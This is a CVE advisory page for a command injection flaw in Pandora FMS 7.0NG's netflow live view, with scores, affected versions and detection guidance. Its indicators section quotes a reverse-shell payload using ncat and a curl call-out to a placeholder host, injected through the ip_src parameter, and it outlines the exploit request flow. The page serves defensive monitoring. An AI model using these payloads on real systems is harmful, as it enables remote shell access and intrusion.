cbcvebase.
CVE-2019-20224
published 2020-01-09

CVE-2019-20224: netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in…

PriorityP273high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
50.62%
98.8th percentile
netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. This issue has been fixed in Pandora FMS 7.0 NG 742.

Affected

2 ranges
VendorProductVersion rangeFixed in
articapandora_fms
articapandora_fms

Detection & IOCsextracted from sources · hover to see the quote

url/pandora_console/index.php?login=1
url/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0
command";ncat -e /bin/bash {ip} {port} #
commandip_src=%22%3Bcurl+{{interactsh-url}}+%23
pathfunctions_netflow.php
  • Monitor POST requests to /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view containing shell metacharacters (e.g., ";, #) in the ip_src parameter, which is the injection point for OS command execution.
  • Shodan/FOFA/Google dork can be used to identify exposed Pandora FMS instances: search for HTTP title 'pandora fms'.
  • The exploit uses a two-step HTTP flow: first a POST login to /pandora_console/index.php?login=1, then a POST to the netflow live view endpoint with the malicious ip_src payload. Correlate these two sequential requests from the same source IP.
  • The draw_button=Draw POST parameter must be present alongside the malicious ip_src value; filter for POST bodies containing both 'draw_button=Draw' and shell metacharacters in 'ip_src'.
  • Outbound ncat/curl connections spawned from the Pandora FMS process (e.g., PHP) may indicate successful exploitation; monitor for child processes of the web server executing network tools like ncat or curl.
  • ·Exploitation requires valid authenticated credentials; unauthenticated exploitation is not possible. The vulnerability is in the netflow_get_stats function within functions_netflow.php.
  • ·The vulnerability is fixed in Pandora FMS 7.0 NG 742; instances running versions prior to 742 are affected.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.